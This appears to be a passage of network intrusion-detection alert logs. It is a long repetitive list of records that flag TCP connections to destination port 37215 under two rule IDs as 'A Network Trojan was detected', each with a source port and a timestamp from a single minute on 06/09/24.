          SID:2835222
          Source Port:40266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169319
          SID:2835222
          Source Port:36512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291651
          SID:2835222
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923777
          SID:2835222
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414666
          SID:2835222
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038761
          SID:2829579
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131261
          SID:2835222
          Source Port:56852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035278
          SID:2835222
          Source Port:48288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300743
          SID:2829579
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720049
          SID:2829579
          Source Port:41948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291152
          SID:2829579
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305061
          SID:2829579
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720154
          SID:2829579
          Source Port:34010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041360
          SID:2835222
          Source Port:50604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682027
          SID:2835222
          Source Port:57894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946254
          SID:2829579
          Source Port:44728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995793
          SID:2829579
          Source Port:54352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861243
          SID:2829579
          Source Port:53362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418592
          SID:2829579
          Source Port:34802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074994
          SID:2835222
          Source Port:48156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644164
          SID:2829579
          Source Port:53400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718338
          SID:2835222
          Source Port:57710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288310
          SID:2835222
          Source Port:39734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205898
          SID:2835222
          Source Port:38578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104807
          SID:2829579
          Source Port:52052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245435
          SID:2835222
          Source Port:59520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718743
          SID:2829579
          Source Port:34928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398529
          SID:2829579
          Source Port:33430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399745
          SID:2835222
          Source Port:40128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158142
          SID:2835222
          Source Port:41558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714191
          SID:2829579
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004143
          SID:2835222
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267394
          SID:2835222
          Source Port:57586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418234
          SID:2829579
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274566
          SID:2835222
          Source Port:40044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645380
          SID:2835222
          Source Port:60780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209013
          SID:2829579
          Source Port:40632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224901
          SID:2829579
          Source Port:47690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294883
          SID:2835222
          Source Port:43734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412068
          SID:2829579
          Source Port:54620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165498
          SID:2829579
          Source Port:54128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080766
          SID:2835222
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248127
          SID:2829579
          Source Port:50588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.945898
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477292
          SID:2829579
          Source Port:40302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287153
          SID:2829579
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557700
          SID:2829579
          Source Port:51832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075662
          SID:2829579
          Source Port:56288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558702
          SID:2829579
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644027
          SID:2829579
          Source Port:57260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285458
          SID:2835222
          Source Port:56226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398105
          SID:2829579
          Source Port:52276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289558
          SID:2835222
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993224
          SID:2835222
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715520
          SID:2835222
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010784
          SID:2829579
          Source Port:51176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026963
          SID:2829579
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417784
          SID:2835222
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720377
          SID:2829579
          Source Port:40118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916354
          SID:2835222
          Source Port:58602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400081
          SID:2835222
          Source Port:47208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031598
          SID:2835222
          Source Port:60956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606714
          SID:2829579
          Source Port:58948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569385
          SID:2829579
          Source Port:47274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718574
          SID:2835222
          Source Port:54028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168907
          SID:2835222
          Source Port:38196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297643
          SID:2835222
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078017
          SID:2829579
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820308
          SID:2829579
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947777
          SID:2829579
          Source Port:36474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870768
          SID:2835222
          Source Port:43282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296135
          SID:2835222
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562199
          SID:2829579
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413555
          SID:2829579
          Source Port:52018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869222
          SID:2829579
          Source Port:52202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993595
          SID:2835222
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567460
          SID:2835222
          Source Port:59768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104351
          SID:2829579
          Source Port:50482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131665
          SID:2829579
          Source Port:37580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945309
          SID:2835222
          Source Port:41300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719128
          SID:2829579
          Source Port:43862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036066
          SID:2835222
          Source Port:56434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820948
          SID:2829579
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037033
          SID:2835222
          Source Port:42524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159370
          SID:2829579
          Source Port:33110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399525
          SID:2835222
          Source Port:47194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168748
          SID:2829579
          Source Port:59108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865850
          SID:2835222
          Source Port:40502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269233
          SID:2829579
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205306
          SID:2835222
          Source Port:32850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413606
          SID:2829579
          Source Port:59870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312765
          SID:2835222
          Source Port:53016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415001
          SID:2829579
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993680
          SID:2829579
          Source Port:57142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076502
          SID:2829579
          Source Port:42128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166536
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038687
          SID:2829579
          Source Port:45068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074693
          SID:2835222
          Source Port:37748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863783
          SID:2835222
          Source Port:50210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159241
          SID:2835222
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821627
          SID:2829579
          Source Port:52578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163061
          SID:2829579
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865752
          SID:2829579
          Source Port:41996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080526
          SID:2829579
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224050
          SID:2835222
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398620
          SID:2829579
          Source Port:45426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397210
          SID:2829579
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821808
          SID:2835222
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035555
          SID:2835222
          Source Port:36084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994729
          SID:2829579
          Source Port:52068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414718
          SID:2829579
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561892
          SID:2829579
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035126
          SID:2835222
          Source Port:56038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818245
          SID:2835222
          Source Port:47992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035460
          SID:2835222
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163770
          SID:2835222
          Source Port:47426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.997746
          SID:2835222
          Source Port:52140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918889
          SID:2829579
          Source Port:52088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415138
          SID:2835222
          Source Port:43108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565933
          SID:2835222
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692154
          SID:2829579
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653102
          SID:2829579
          Source Port:41202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868834
          SID:2835222
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164816
          SID:2829579
          Source Port:44056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475583
          SID:2829579
          Source Port:39892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206067
          SID:2829579
          Source Port:41828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720715
          SID:2829579
          Source Port:34038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598456
          SID:2829579
          Source Port:33596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027802
          SID:2835222
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224996
          SID:2835222
          Source Port:44828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417765
          SID:2829579
          Source Port:49614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712991
          SID:2829579
          Source Port:37932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267554
          SID:2829579
          Source Port:44834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818742
          SID:2835222
          Source Port:43704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986239
          SID:2829579
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917032
          SID:2829579
          Source Port:42150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282470
          SID:2829579
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167306
          SID:2835222
          Source Port:50284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008268
          SID:2835222
          Source Port:53828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869088
          SID:2829579
          Source Port:34230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290342
          SID:2835222
          Source Port:58816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168120
          SID:2829579
          Source Port:58254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104287
          SID:2829579
          Source Port:41780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987550
          SID:2829579
          Source Port:44602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948975
          SID:2835222
          Source Port:48642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719104
          SID:2835222
          Source Port:42922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472083
          SID:2835222
          Source Port:35944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821472
          SID:2829579
          Source Port:41144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034225
          SID:2835222
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029267
          SID:2829579
          Source Port:50328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719041
          SID:2829579
          Source Port:35444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716551
          SID:2835222
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163139
          SID:2835222
          Source Port:46666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987209
          SID:2829579
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644669
          SID:2829579
          Source Port:32952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714275
          SID:2835222
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076451
          SID:2829579
          Source Port:52848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074558
          SID:2835222
          Source Port:54784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417712
          SID:2829579
          Source Port:48456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396688
          SID:2835222
          Source Port:40726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539127
          SID:2829579
          Source Port:35544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471233
          SID:2835222
          Source Port:38964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398470
          SID:2835222
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929667
          SID:2829579
          Source Port:45710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945375
          SID:2829579
          Source Port:40578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244718
          SID:2835222
          Source Port:59940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412880
          SID:2829579
          Source Port:49740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715820
          SID:2835222
          Source Port:42112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417688
          SID:2829579
          Source Port:59844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287024
          SID:2829579
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167063
          SID:2829579
          Source Port:48318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908837
          SID:2835222
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643264
          SID:2829579
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082699
          SID:2835222
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038236
          SID:2835222
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990588
          SID:2835222
          Source Port:44938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924471
          SID:2829579
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245521
          SID:2835222
          Source Port:34634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715454
          SID:2835222
          Source Port:35504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241730
          SID:2829579
          Source Port:47952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032980
          SID:2829579
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157115
          SID:2829579
          Source Port:57514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565068
          SID:2835222
          Source Port:43540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169722
          SID:2835222
          Source Port:41888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894368
          SID:2835222
          Source Port:33674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987152
          SID:2829579
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291429
          SID:2835222
          Source Port:51108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466974
          SID:2829579
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274788
          SID:2835222
          Source Port:45840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.947424
          SID:2829579
          Source Port:42680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667514
          SID:2835222
          Source Port:58708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277241
          SID:2829579
          Source Port:43916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822166
          SID:2835222
          Source Port:51884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033544
          SID:2835222
          Source Port:58562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539643
          SID:2829579
          Source Port:45080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396071
          SID:2829579
          Source Port:47308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595102
          SID:2829579
          Source Port:60512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716986
          SID:2829579
          Source Port:38770
          Destination Port:37215
